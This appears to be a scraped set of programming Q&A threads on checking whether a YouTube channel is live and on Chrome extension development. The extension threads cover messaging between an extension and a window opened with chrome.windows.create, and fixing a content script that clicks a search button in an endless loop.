If the stream is currently offline, the property concurrentViewers will not exist. In other words, the only difference between an online and an offline livestream is whether concurrentViewers is present. With this information, you can check if the channel is currently streaming or not (at least for its default stream).
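As a sketch, that check could look like this (VIDEO_ID and API_KEY are placeholders; presence of concurrentViewers is treated as "live", per the description above):
const url = 'https://youtube.googleapis.com/youtube/v3/videos?part=liveStreamingDetails&id=VIDEO_ID&key=API_KEY';
const data = await fetch(url).then(res => res.json());
const details = data.items && data.items[0] && data.items[0].liveStreamingDetails;
// concurrentViewers only exists while the stream is online
const isLive = !!(details && details.concurrentViewers);
console.log(isLive ? 'default stream is live' : 'default stream is offline');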
I found the YouTube API to be very restrictive given the cost of the search operation. Web scraping with aiohttp and BeautifulSoup was not an option, since the better indicators required JavaScript support. Hence I turned to Selenium. I looked for the CSS selector #info-text and then searched for the string "Started streaming" or "watching now" in it.
You can run a small API on Heroku with Flask as well.
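The same idea in JavaScript with selenium-webdriver might look roughly like this (the #info-text selector and the marker strings come from the answer above and may break whenever YouTube changes its markup; CHANNEL_ID is a placeholder):
const { Builder, By } = require('selenium-webdriver');

(async () => {
    const driver = await new Builder().forBrowser('chrome').build();
    try {
        await driver.get('https://www.youtube.com/channel/CHANNEL_ID/live');
        const info = await driver.findElement(By.css('#info-text')).getText();
        // "watching now" or "Started streaming" indicates an active stream
        console.log(/watching now|Started streaming/.test(info) ? 'live' : 'not live');
    } finally {
        await driver.quit();
    }
})();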

Chrome extension: sending data to window created with chrome.windows.create

I'm struggling to find the best way to communicate with my web app, which I'm opening with chrome.windows.create in my extension.
I've got the wiring between content script and background script right. I can right-click an element and send its value to the background script, and the background script creates a window containing my web app. But from there I can't figure out how to access and use that value in my web app (it needs to load the value into an editor).
I've tried setting fns and vars on the window and tab objects, but somehow they go missing from the window object once the web app is loaded.
With chrome.tabs.executeScript I can fiddle with the dom, but not set global variables or anything on 'window' either.
If there isn't a better way, I guess I'm forced to add to the DOM and pick that up once my web app is loaded, but it seems messy. I was hoping for a cleaner method, like setting an onLoadFromExtension fn which my web app can execute to get the value it needs.
I found a method that works after much trial and error, though it still seems error-prone. And it also depends on the extension ID matching the installed one, so if that can't be hard-coded it'll be another message that needs passing through another channel (after reading up, it looks like it can be hard-coded, since it's a hash of the public key, so problem solved)... Starting to think manipulating the DOM is less messy...
background.js:
var selectedContent = null;
chrome.runtime.onMessageExternal.addListener(
    function(request, sender, sendResponse) {
        console.info("------------------------------- Got request", request);
        if (request.getSelectedContent) {
            sendResponse(selectedContent);
        }
    });
web app:
var extensionId = "naonkagfcedpnnhdhjahadkghagenjnc";
chrome.runtime.sendMessage(extensionId, {getSelectedContent: "true"},
    response => {
        console.info("----------------- Got response", response);
        if (response) {
            this.text = response;
        }
    });
manifest.json:
"externally_connectable": {
    "ids": ["naonkagfcedpnnhdhjahadkghagenjnc"],
    "matches": ["http://localhost:1338/*"]
},
Within the popup, do the following:
const parentWindow = window.opener
parentWindow.postMessage({ action: 'opened' })
window.onmessage = msg => {
    alert(JSON.stringify(msg.data)) // Alerts you with {"your":"data"}
}
Within the script that will call chrome.windows.create, do the following:
window.onmessage = msg => {
    if (msg.data.action == 'opened') {
        msg.source.postMessage({ your: 'data' })
    }
}
Set setSelfAsOpener: true when calling chrome.windows.create
How does this work?
Due to limitations of the Chrome extension windows API, the created window needs to post a message to its creator (aka window.opener) or else the creator won't have access to a WindowProxy (useful for posting messages to the created window).

Chrome extension and .click() loops using values from localStorage

I have made a Chrome extension to help with using a small search engine in our company's intranet. That search engine is a very old, really convoluted webpage, and it doesn't take parameters in the URL. No chance that the original authors will assist:
The extension popup offers an input text box to type your query. Your query is then saved in localStorage.
There is a content script inserted in the intranet page that reads the localStorage key, does document.getElementById("textbox").value = "your query"; and then does document.getElementById("textbox").click();
The expected result is that your search is performed. And that's all.
The problem is that the click gets performed an unlimited number of times in an infinite loop, and I cannot see why it's repeating.
I would be grateful if you would be able to assist. This is my first Chrome extension and all what I have been learning about how to make them has been a great experience so far.
This is the relevant code:
The extension popup where you type your query
popup.html
<input type="search" id="cotext"><br>
<input type="button" value="Name Search" id="cobutton">
The attached js of the popup
popup.js
var csearch = document.getElementById("cotext");
var co = document.getElementById("cobutton");
co.addEventListener("click", function() {
    localStorage["company"] = csearch.value;
    window.open('url of intranet that has content script applied');
});
And now the background file to help with communication between parts:
background.js
chrome.extension.onRequest.addListener(function(request, sender, sendResponse) {
    sendResponse({data: localStorage[request.key]});
});
And finally the content script that is configured in the manifest to be injected on the url of that search engine.
incomingsearch.js
chrome.extension.sendRequest(
    {method: "getLocalStorage", key: "company"},
    function(response) {
        var str = response.data;
        if (document.getElementById("txtQSearch").value === "") {
            document.getElementById("txtQSearch").value = str;
        }
        document.getElementById("btnQSearch").click();
    });
So as I mentioned before, the code works... not just once (as it should) but many, many times. Do I really have an infinite loop somewhere? I don't see it... For the moment I have disabled .click() and put .focus() in its place, but it's a workaround. I would really like to use .click() here.
Thanks in advance!
The loop is probably caused by clicking the button even if it already has a value. Try putting the click inside your if. That said, you are overcomplicating it.
You can access the extension's data inside content scripts directly by replacing localStorage with the chrome.storage extension API. Add the "storage" (silent) permission to your manifest.json, like this:
"permissions": ["storage"]
Remove the message passing code in background.js. Then replace the popup button listener contents with:
chrome.storage.local.set({ "company": csearch.value }, function() {
    chrome.tabs.create({ url: "whatever url" })
})
Replace the content script with:
chrome.storage.local.get("company", function(items) {
    if (document.querySelector("#txtQSearch").value == "") {
        document.querySelector("#txtQSearch").value = items.company
        document.querySelector("#btnQSearch").click()
    }
})
document.querySelector() performs the same function here as getElementById, but it is much more robust. It also has fewer capital letters, which makes it easier to type, in my opinion.
